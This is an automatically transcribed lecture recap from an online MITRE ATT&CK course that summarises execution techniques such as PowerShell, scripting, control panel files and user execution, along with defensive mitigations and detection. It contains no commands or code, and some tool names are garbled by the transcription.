8 hours 28 minutes

Video Transcription

hello and congratulations on finishing the execution phase of the minor attack framework. So you might be asking yourself at this point, what should we know? What did we go through? What did we look at? Well, we started with command line interface, and by the end of that, we have defined what that was.
We discussed some examples of common command line attack tools,
and we also looked at mitigation and detection techniques, remembering that this could be any command line tool, not just the ones that are limited to Windows operating systems. We also went through execution through a Piatt. We reviewed execution through AP on what it waas
some tools that you could use. We looked at mitigation techniques and detection techniques as well. In this particular section,
we then discuss control panel items. We reviewed what that was methods for attacking using control panel items such as themed not CPL file extension that could be sent via phishing emails and things of that nature. We reviewed some mitigating techniques and detection techniques as well,
again coming back to blocking malicious attachments and also user awareness training. With respect to this type of file.
We then got into power shell, which could be considered a command line interface. But it warns a separate discussion we reviewed. What power show is some of its uses, and as well is that mitigation techniques and detection techniques remember that least privilege should prevail here. And if you're in, users don't need power shell
if they don't need to run scripts. If they don't need to do things of that nature using power shell, then it should not be permitted or allowed on the systems. Now you could also set power show upto only run as an administrator. But if after an actor were able to get administrative access to a system or an administrative account,
then they would be able to circumvent these controls. So it's also beneficial
to have some form of analytics in place that would allow you to track activity that could be considered malicious and not just standard power shell activity, because that could become quite cumbersome and lengthy bit along information if you want to trim it down
now. Scripting was also a separate discussion where we talked about some different types of scripting as well as some tools. We talked about the menace plate framework and how it is essentially ah, combination of scripts that can be used for both good and evil.
We also talked about power Spoiled, which is essentially a grouping of power shell
scripts that can be used for malicious purposes well, as well as for security testing. And so we looked at some of those areas. We reviewed mitigation and detection techniques again, making sure that scripts cannot be running the environment unless they're approved making sure
that scripting activity is reviewed on a regular basis, that you're logging, scripting activity as it happens within the environment.
And if there's any anomalous behavior noted that it's reviewed and checked out,
we then into things off in our discussions with user execution, which is essentially when a user interacts with content. And so we talked about direct execution to things like attachment, interaction and things of that nature as well as you know, going to websites just general Web surfing, and you hit
a malicious site that interacts with your system and is able to then
give it threat, actor access or download payloads that may be malicious. We talked about some common file types that I'm sure you're familiar with the dot doc, pdf Excel files and things of that nature. But we also talked about txt files text files as not being able to run viruses and things of those natures. So
if you ever see a text file in an attachment
on email, always ensure that you review that found carefully that you don't just open it because you assume it's safe. Threat Actors have some techniques where they can mask the extension or make the extension look like something that it is not,
thereby fooling you into interacting with that file. We talked about mitigation and detection techniques here, one of which was in user awareness training. And so we come back to that topic over and over again that educating users and telling them what is safe to click what is not safe. How to evaluate
the validity of an email, how to not just blindly trust
information that's provided to them. I know that throughout this year we've seen a number of spoofing attacks, as well as phishing attacks related to high level executives, owners of organizations and things of that nature that are either the result of account, compromise or a threat. Actor who knows who.
Um, the CEO is of an organization and in the attempt to
spoof that users email address
and then get people to interact in a manner that they shouldn't. Now what we're didn't list here was the case study. So I hope you've taken the time to go through that and to evaluate your organization and its controls. And hopefully that was beneficial to you in being able to possibly implement some new controls to help mitigate some risks.
So with that in mind,
I want to thank you for your time today, and I look forward to seeing you again soon.

Up Next

Application of the MITRE ATT&CK Framework

This MITRE ATT&CK training is designed to teach students how to apply the matrix to help mitigate current threats. Students will move through the 12 core areas of the framework to develop a thorough understanding of various access ATT&CK vectors.

Instructed By

Instructor Profile Image
Robert Smith
Director of Security Services at Corsica